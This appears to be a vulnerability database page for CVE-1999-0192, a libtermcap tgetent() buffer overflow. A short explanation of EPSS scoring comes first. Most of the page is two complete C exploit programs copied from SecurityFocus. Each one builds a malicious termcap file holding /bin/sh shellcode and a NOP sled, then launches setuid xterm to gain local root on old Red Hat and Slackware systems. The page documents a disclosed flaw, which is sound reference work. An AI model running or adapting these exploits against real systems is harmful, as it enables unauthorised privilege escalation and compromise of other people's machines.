CVE-1999-0192 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

// source: https://www.securityfocus.com/bid/588/info A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable. Under Red Hat Linux 5.2 and 4.2, this could lead to local users gaining root privileges, as xterm (as well as other possibly setuid programs) are linked against libtermcap. Under Red Hat Linux 6.0, xterm is not setuid root. Debian and Caldera OpenLinux use the ncurses library instead of termcap and thus are not vulnerable. /* **************************************************** *** libtermcap xterm exploit *** *** by m0f0 1999 *** *** *** *** it works for xterm/nxterm *** *** Tested Slackware 3.5, 3.6 *** **************************************************** */ #include <stdio.h> #define BUF_SIZE 5000 #define POS_RET 2000 #define POS_SEP 3000 #define RETADDR 0xbfffefef #define EGG "/tmp/egg_termcap" // shellcode char shellcode[] = // 48 caracteres "\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa" "\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04" "\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff" "\xff\xff/bin/sh"; void main (int argc, char *argv[]) { int i; FILE *f; char buf[BUF_SIZE]; long retaddr, offset; printf ("\n"); printf ("****************************************** \n"); printf ("* libtermcap xterm exploit, by m0f0 1999 * \n"); printf ("****************************************** \n\n"); printf ("Use : %s [offset] \n", argv[0]); offset = 0; if (argc>1) { offset = atol (argv[1]); } retaddr = RETADDR + offset; printf ("Return Address = 0x%x \n",retaddr); // Fill buffer with NOP's memset (buf, 0x90, BUF_SIZE); buf[BUF_SIZE]=0; // Set termcap file header and sep memcpy (buf, "xterm|", 6); memcpy (buf+POS_SEP,":\\",2); // Return Address for (i=POS_RET; i<=POS_SEP-10; i+=4) { *(long*)(buf+i) = (long) retaddr; } // Copy shellCode for (i=0; i<strlen(shellcode); i++) { buf[i+2000] = shellcode[i]; } // Write EGG_TERMCAP f = fopen (EGG,"w"); fprintf (f,"%s",buf); fclose (f); // Export TERMCAP setenv ("TERMCAP", EGG, 1); // Run program execl ("/usr/X11R6/bin/xterm","xterm",NULL); }

// source: https://www.securityfocus.com/bid/588/info A buffer overflow existed in libtermcap's tgetent() function, which could cause the user to execute arbitrary code if they were able to supply their own termcap file. Versions of libtermcap 2.0.8 and earliear are vulnerable. Under Red Hat Linux 5.2 and 4.2, this could lead to local users gaining root privileges, as xterm (as well as other possibly setuid programs) are linked against libtermcap. Under Red Hat Linux 6.0, xterm is not setuid root. Debian and Caldera OpenLinux use the ncurses library instead of termcap and thus are not vulnerable. /* Local exploit for suid root programs linked to libtermcap < 2.0.8-15 * * tested with xterm and nxterm on RedHat 5.2 and 4.2 * * [email protected] * http://www.lucid-solutions.com * * Usage: * ./smashcap -default is buffer size of 4210 and offset of 300 * and seems to work on RH 5.2 * * Adjust offsets (somewhere between 230 - 1140) if necessary * * ./smashcap <offset> -buffer size defaults to 4210 * ./smashcap <offset> <buffersize> * * * In order to stop script kids/opportunists, one MINOR change must be * made in order for this to work. * * Use only to test your machines to show you that you must patch libtermcap. * Quick fix, chmod u-s ALL suid root programs linked with libtermcap. * * - sk8 of LS * */ #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #define filename "/tmp/lstermcap" #define entry1 "xterm|" #define DEFAULT_BUFSIZE 4210 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; /* Linux shellcode */ long get_sp(void) { __asm__("movl %esp, %eax\n"); } int main(int argc, char *argv[]) { int bufsize, offset, i, fd; long *bufptr; char *ptr, *buffer, *tempbuf; setenv("TERMCAP", "/tmp/lstermcap", 1); bufsize=DEFAULT_BUFSIZE; if (argc > 2) bufsize=atoi(argv[2]); if (argc > 1) offset=atoi(argv[1]); else offset=300; printf("bufsize: %i\noffset: %i\n", bufsize,offset); if(!(buffer = malloc(bufsize))) { printf("can't allocate enough memory\n"); exit(0); } if(!(tempbuf = malloc(bufsize+strlen(entry1) ))) { printf("can't allocate enough memory\n"); exit(0); } printf("get_sp(): 0x%x\n", get_sp()); printf("get_sp()-offs: 0x%x\n", (get_sp()-offset) ); ptr=buffer; bufptr = (long *)(buffer+2); /* align */ for (i = 0; i < bufsize; i += 4) *(bufptr++) = (get_sp()-offset); for (i = 0; i < (bufsize/2); i++) buffer[i] = 0x90; ptr=buffer + ((bufsize/2) - strlen(shellcode)/2); for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i]; //shellcode ptr=ptr+24; /* now insert the characters : and \ into the termcap - these are vital */ *(ptr++)=0x3a; *(ptr++)=0x5c; snprintf(tempbuf, (bufsize+strlen(entry1)), "%s%s%s", entry1, buffer); fd = open(filename, O_WRONLY|O_CREAT|O_TRUNC, 0666); write (fd, tempbuf, strlen(tempbuf)); close(fd); printf("made termcap\n"); execl("/usr/X11R6/bin/xterm","xterm", 0); }